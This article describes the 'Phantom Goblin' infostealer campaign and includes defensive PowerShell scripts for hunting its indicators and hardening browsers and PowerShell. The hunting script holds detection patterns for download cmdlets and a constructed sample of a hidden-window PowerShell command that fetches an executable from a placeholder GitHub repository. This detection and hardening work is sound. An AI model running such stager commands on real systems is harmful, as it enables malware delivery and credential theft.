A complex malware campaign dubbed "Phantom Goblin" has been discovered that relies on social engineering to install information-stealing malware. The malware is distributed as RAR attachments to spam messages; each archive contains a malicious Windows shortcut (LNK) file posing as a PDF.
When the victim opens the LNK file, it launches PowerShell, which downloads further payloads from a GitHub repository and establishes persistence by creating a registry entry that relaunches the malware at system boot. The payloads, named "updater.exe," "vscode.exe," and "browser.exe," mimic legitimate applications, which makes them harder to spot.
The malware primarily targets web browsers and development tools. It forcibly terminates browsers such as Chrome, Brave, and Edge and then harvests cookies, saved passwords, and browsing history. The "updater.exe" payload relaunches the browser with its remote debugging interface enabled, which lets the malware read cookies through the browser itself rather than from the encrypted on-disk store; this sidesteps Chrome's App Bound Encryption (ABE) and allows covert data exfiltration.
The stolen data is then sent to a Telegram channel via the Telegram Bot API, which gives the operators real-time access to it while the traffic blends in with legitimate use of Telegram.
Phantom Goblin also abuses Visual Studio Code (VSCode) tunnels for unauthorised remote access. The "vscode.exe" payload downloads a legitimate copy of VSCode, unpacks it, and starts a tunnel so that the attackers keep persistent control of the compromised PC. The tunnel's connection details are sent to a Telegram bot, giving the operators remote access that does not trigger traditional security alerts, because the tunnel rides on a legitimate Microsoft service.
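The behaviours described above (PowerShell fetching a stage from GitHub, the look-alike payload names, a browser relaunched with remote debugging, a VS Code tunnel, and a boot-time registry entry) can be hunted for on a Windows endpoint without Sysmon. The PowerShell script below is an added example written for this page, not code from the report or from the malware: the payload and browser names come from the article, while the download-cmdlet list, the `--remote-debugging-port`/`--remote-debugging-pipe` switches, the `code tunnel` command line and the Run-key locations are assumptions about how the described technique is normally invoked. The sample events at the end are constructed so the logic can be exercised offline; the live scan afterwards checks the running process list and the Run keys.

```powershell
# Added hunting example for the Phantom Goblin behaviours described in the
# article. Not code from the report or the malware. Assumptions: the download
# cmdlet list, the remote-debugging switches, the "code tunnel" command line
# and the Run-key locations are the usual ways the technique is invoked.

# Payload names taken from the article.
$SuspectNames = @('updater.exe', 'vscode.exe', 'browser.exe')
# Browsers named in the article (Edge runs as msedge.exe, Brave as brave.exe).
$Browsers = @('chrome.exe', 'brave.exe', 'msedge.exe')
# Download primitives a PowerShell stager typically uses (assumption).
$DownloadVerbs = 'Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile'

function Test-PhantomGoblinIndicator {
    param(
        [Parameter(Mandatory)][string]$Image,   # path or file name of the process
        [string]$CommandLine = '',
        [string]$ParentImage = ''
    )
    $hits   = [System.Collections.Generic.List[string]]::new()
    $name   = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()
    $parent = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()

    # 1. Look-alike payload names.
    if ($SuspectNames -contains $name) { $hits.Add("lookalike-payload:$name") }

    # 2. PowerShell pulling a stage from GitHub (LNK -> PowerShell -> GitHub).
    if (@('powershell.exe', 'pwsh.exe') -contains $name -and
        $CommandLine -match 'github' -and $CommandLine -match $DownloadVerbs) {
        $hits.Add("powershell-github-download:parent=$parent")
    }

    # 3. A browser (re)started with remote debugging, the lever used to read
    #    cookies through DevTools instead of the ABE-protected on-disk store.
    if ($Browsers -contains $name -and $CommandLine -match '--remote-debugging-(port|pipe)') {
        $hits.Add("browser-remote-debugging:$name,parent=$parent")
    }

    # 4. VS Code CLI starting a tunnel ("code tunnel ...").
    if (@('code.exe', 'code-tunnel.exe') -contains $name -and $CommandLine -match '\btunnel\b') {
        $hits.Add("vscode-tunnel:parent=$parent")
    }
    return $hits.ToArray()
}

function Find-SuspiciousRunKey {
    # Per-user autostart (writable without admin) plus the machine-wide key.
    $runKeys = @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run')
    $meta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($meta -contains $p.Name) { continue }
            $value = [string]$p.Value
            if ($value -match 'powershell|pwsh|github|updater\.exe|vscode\.exe|browser\.exe') {
                [pscustomobject]@{ Key = $key; Name = $p.Name; Value = $value }
            }
        }
    }
}

# Constructed sample events (not from a real incident) to exercise the logic offline.
$sample = @(
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'powershell -w hidden -c "iwr https://github.com/example/repo/raw/main/updater.exe -OutFile $env:TEMP\updater.exe"' },
    @{ Image = 'C:\Program Files\Google\Chrome\Application\chrome.exe'; ParentImage = 'C:\Users\Public\updater.exe'
       CommandLine = 'chrome.exe --remote-debugging-port=9222 --headless' },
    @{ Image = 'C:\Users\u\AppData\Local\Programs\code\bin\code.exe'; ParentImage = 'C:\Users\Public\vscode.exe'
       CommandLine = 'code.exe tunnel --accept-server-license-terms' },
    @{ Image = 'C:\Program Files\Google\Chrome\Application\chrome.exe'; ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'chrome.exe --profile-directory=Default' }   # benign, should not match
)
foreach ($e in $sample) {
    $hits = Test-PhantomGoblinIndicator @e
    if ($hits) { '{0}: {1}' -f $e.Image, ($hits -join ', ') }
}

# Live scan of the current process list (Win32_Process carries the command line
# and parent PID, so no Sysmon is needed), followed by the Run keys.
$procs = Get-CimInstance Win32_Process
$byId = @{}
foreach ($p in $procs) { $byId[$p.ProcessId] = $p }
foreach ($p in $procs) {
    if (-not $p.ExecutablePath) { continue }
    $parent = $byId[$p.ParentProcessId]
    $parentPath = if ($parent) { [string]$parent.ExecutablePath } else { '' }
    $hits = Test-PhantomGoblinIndicator -Image $p.ExecutablePath -CommandLine ([string]$p.CommandLine) -ParentImage $parentPath
    if ($hits) { 'PID {0} {1}: {2}' -f $p.ProcessId, $p.ExecutablePath, ($hits -join ', ') }
}
Find-SuspiciousRunKey
```

The first three constructed events match indicators 2, 3 and 4 respectively and the fourth (a normal Chrome launch) matches nothing. On a real host, a browser whose parent is not explorer.exe or the browser itself, or a `code.exe tunnel` started by an executable outside the VS Code install directory, is the signal worth escalating; the name list alone is weak, since the attacker can rename the payloads at will.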
Prevention tips
Experts recommend several practices to protect systems against Phantom Goblin and similar threats:
Email filtering: Use advanced filtering to block suspicious attachments, especially RAR, ZIP, and LNK files, and make sure the filter inspects archive contents, since here the LNK file arrives inside a RAR archive. Scan every attachment with up-to-date antivirus software before opening it.
Disabling VSCode tunnels: Enforce access controls and authentication so that unauthorised users cannot start Visual Studio Code tunnels, and limit the use of VSCode on sensitive systems. Because the malware downloads its own copy of VSCode, restricting only the pre-installed editor is not enough; the control has to cover any unapproved binary that starts a tunnel and the tunnel service's network path.
PowerShell restrictions: Disable or limit PowerShell and script execution unless it is genuinely required, keeping in mind that the execution policy alone is not a security boundary (a launcher can bypass it), so application control such as AppLocker or WDAC is needed. Monitor for suspicious PowerShell activity, such as scripts downloaded from external sources, to detect and stop malicious operations.
Browser security: Configure browser policies that block unauthorised remote debugging and limit access to data stored in the browser. Multi-factor authentication (MFA) reduces the value of stolen passwords, and short session timeouts shrink the window in which a stolen session cookie remains valid.
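Apart from mail filtering, the tips above are local policy changes. The script below is an added example written for this page, not vendor-supplied code: it disables browser remote debugging and DevTools through the documented Chromium and Edge policy registry keys (the Brave path assumes Brave honours Chromium policies under its own vendor key), turns on PowerShell script block and module logging, sets the execution policy, and reads the settings back so the result can be checked. It must run elevated. It does not attempt to block VS Code tunnels, which needs application control and a network block of the tunnel service rather than a registry value.

```powershell
# Added hardening example for the prevention tips in the article. Not from the
# article or any vendor. Run in an elevated PowerShell session.
# Registry paths and value names are the documented Chromium/Edge and
# PowerShell Group Policy locations; the Brave path is an assumption.

$BrowserPolicyKeys = @{
    Chrome = 'HKLM:\SOFTWARE\Policies\Google\Chrome'
    Edge   = 'HKLM:\SOFTWARE\Policies\Microsoft\Edge'
    Brave  = 'HKLM:\SOFTWARE\Policies\BraveSoftware\Brave'   # assumption, see above
}

function Set-PolicyValue {
    param([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Disable-BrowserRemoteDebugging {
    foreach ($browser in $BrowserPolicyKeys.Keys) {
        $key = $BrowserPolicyKeys[$browser]
        # RemoteDebuggingAllowed=0: the browser ignores --remote-debugging-port
        # and --remote-debugging-pipe, closing the lever used against ABE.
        Set-PolicyValue -Key $key -Name 'RemoteDebuggingAllowed' -Value 0
        # DeveloperToolsAvailability=2: DevTools disallowed entirely
        # (0 = disallowed only for force-installed extensions, 1 = allowed).
        Set-PolicyValue -Key $key -Name 'DeveloperToolsAvailability' -Value 2
    }
}

function Enable-PowerShellLogging {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    # Script block logging writes event 4104 to Microsoft-Windows-PowerShell/Operational,
    # which is where a hidden-window stager pulling from GitHub becomes visible.
    Set-PolicyValue -Key "$base\ScriptBlockLogging" -Name 'EnableScriptBlockLogging' -Value 1
    Set-PolicyValue -Key "$base\ModuleLogging"      -Name 'EnableModuleLogging'      -Value 1
    Set-PolicyValue -Key "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type 'String'
    # The execution policy is a safety rail, not a boundary: a launcher can pass
    # -ExecutionPolicy Bypass. Real restriction needs AppLocker or WDAC, which
    # also drops PowerShell into Constrained Language Mode.
    Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force
}

function Test-Hardening {
    # Reads the settings back; $true means the control is in place.
    $result = [ordered]@{}
    foreach ($browser in $BrowserPolicyKeys.Keys) {
        $key = $BrowserPolicyKeys[$browser]
        $v = (Get-ItemProperty -Path $key -Name 'RemoteDebuggingAllowed' -ErrorAction SilentlyContinue).RemoteDebuggingAllowed
        $result["$browser.RemoteDebuggingDisabled"] = ($v -eq 0)
        $d = (Get-ItemProperty -Path $key -Name 'DeveloperToolsAvailability' -ErrorAction SilentlyContinue).DeveloperToolsAvailability
        $result["$browser.DevToolsDisallowed"] = ($d -eq 2)
    }
    $sbl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -ErrorAction SilentlyContinue
    $result['PowerShell.ScriptBlockLogging'] = ($sbl.EnableScriptBlockLogging -eq 1)
    $result['PowerShell.ExecutionPolicy'] = [string](Get-ExecutionPolicy -Scope LocalMachine)
    [pscustomobject]$result
}

Disable-BrowserRemoteDebugging
Enable-PowerShellLogging
Test-Hardening
```

Running `Test-Hardening` before and after the two `Disable-`/`Enable-` calls shows the change; every browser row should read `True` afterwards and the execution policy `AllSigned`. Browsers pick the policy up on next launch, and a managed Chrome or Edge shows it under chrome://policy or edge://policy, which is the quickest way to confirm the value was not overridden by a higher-precedence GPO.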